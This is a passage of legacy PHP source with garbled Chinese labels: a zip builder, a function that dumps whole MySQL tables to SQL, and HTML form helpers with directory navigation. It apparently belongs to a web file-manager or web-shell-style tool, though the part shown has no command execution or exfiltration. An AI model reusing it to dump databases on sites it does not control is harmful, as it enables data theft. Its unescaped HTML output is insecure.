$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode('', $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file() {
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
// 掘爺杅擂踱
function sqldumptable($table, $fp=0) {
$tabledump = "DROP TABLE IF EXISTS $table;\n";
$tabledump .= "CREATE TABLE $table (\n";
$firstfield=1;
$fields = mysql_query("SHOW FIELDS FROM $table");
while ($field = mysql_fetch_array($fields)) {
if (!$firstfield) {
$tabledump .= ",\n";
} else {
$firstfield=0;
}
$tabledump .= " $field[Field] $field[Type]";
if (!empty($field["Default"])) {
$tabledump .= " DEFAULT '$field[Default]'";
}
if ($field['Null'] != "YES") {
$tabledump .= " NOT NULL";
}
if ($field['Extra'] != "") {
$tabledump .= " $field[Extra]";
}
}
mysql_free_result($fields);
$keys = mysql_query("SHOW KEYS FROM $table");
while ($key = mysql_fetch_array($keys)) {
$kname=$key['Key_name'];
if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
$kname="UNIQUE|$kname";
}
if(!is_array($index[$kname])) {
$index[$kname] = array();
}
$index[$kname][] = $key['Column_name'];
}
mysql_free_result($keys);
while(list($kname, $columns) = @each($index)) {
$tabledump .= ",\n";
$colnames=implode($columns,",");
if ($kname == "PRIMARY") {
$tabledump .= " PRIMARY KEY ($colnames)";
} else {
if (substr($kname,0,6) == "UNIQUE") {
$kname=substr($kname,7);
}
$tabledump .= " KEY $kname ($colnames)";
}
}
$tabledump .= "\n);\n\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
$rows = mysql_query("SELECT * FROM $table");
$numfields = mysql_num_fields($rows);
while ($row = mysql_fetch_array($rows)) {
$tabledump = "INSERT INTO $table VALUES(";
$fieldcounter=-1;
$firstfield=1;
while (++$fieldcounter<$numfields) {
if (!$firstfield) {
$tabledump.=", ";
} else {
$firstfield=0;
}
if (!isset($row[$fieldcounter])) {
$tabledump .= "NULL";
} else {
$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
}
}
$tabledump .= ");\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
}
mysql_free_result($rows);
}
class FORMS {
function tableheader() {
echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
}
function headerform($arg=array()) {
global $dir;
if ($arg[enctype]){
$enctype="enctype=\"$arg[enctype]\"";
} else {
$enctype="";
}
if (!isset($arg[method])) {
$arg[method] = "POST";
}
if (!isset($arg[action])) {
$arg[action] = '';
}
echo " <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
echo " <tr>\n";
echo " <td>".$arg[content]."</td>\n";
echo " </tr>\n";
echo " </form>\n";
}
function tdheader($title) {
global $dir;
echo " <tr class=\"firstalt\">\n";
echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">殿隙</a>]</b></td>\n";
echo " </tr>\n";
}
function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
if ($bgcolor=='2') {
$css="secondalt";
} elseif ($bgcolor=='1') {
$css="firstalt";
} else {
$css=$bgcolor;
}
$height = empty($height) ? "" : " height=".$height;
$colspan = empty($colspan) ? "" : " colspan=".$colspan;
echo " <tr class=\"".$css."\">\n";
echo " <td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
echo " </tr>\n";
}
function tablefooter() {
echo "</table>\n";
}
function formheader($action='',$title,$target='') {
global $dir;
$target = empty($target) ? "" : " target=\"".$target."\"";
echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
echo " <tr class=\"firstalt\">\n";
echo " <td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">殿隙</a>]</b></td>\n";
echo " </tr>\n";
}
function makehidden($name,$value=''){
echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
}
function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
$css = ($css == 'input') ? " class=\"input\"" : "";
$input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
return $input;
}
function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
$textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
return $textarea;
}
function formfooter($over='',$height=''){
$height = empty($height) ? "" : " height=\"".$height."\"";
echo " <tr class=\"secondalt\">\n";
echo " <td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"隅\"></td>\n";
echo " </tr>\n";
echo " </form>\n";
echo $end = empty($over) ? "" : "</table>\n";
}
function makeselect($arg = array()){
if ($arg[multiple]==1) {
$multiple = " multiple";
if ($arg[size]>0) {
$size = "size=$arg[size]";
}
}
if ($arg[css]==0) {
$css = "class=\"input\"";
}
$select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
if (is_array($arg[option])) {
foreach ($arg[option] AS $key=>$value) {
if (!is_array($arg[selected])) {
if ($arg[selected]==$key) {
$select .= "<option value=\"$key\" selected>$value</option>\n";
} else {
$select .= "<option value=\"$key\">$value</option>\n";
}
} elseif (is_array($arg[selected])) {
if ($arg[selected][$key]==1) {
$select .= "<option value=\"$key\" selected>$value</option>\n";
} else {
$select .= "<option value=\"$key\">$value</option>\n";
}
}
}
}
$select .= "</select>\n";
return $select;
}
}
?>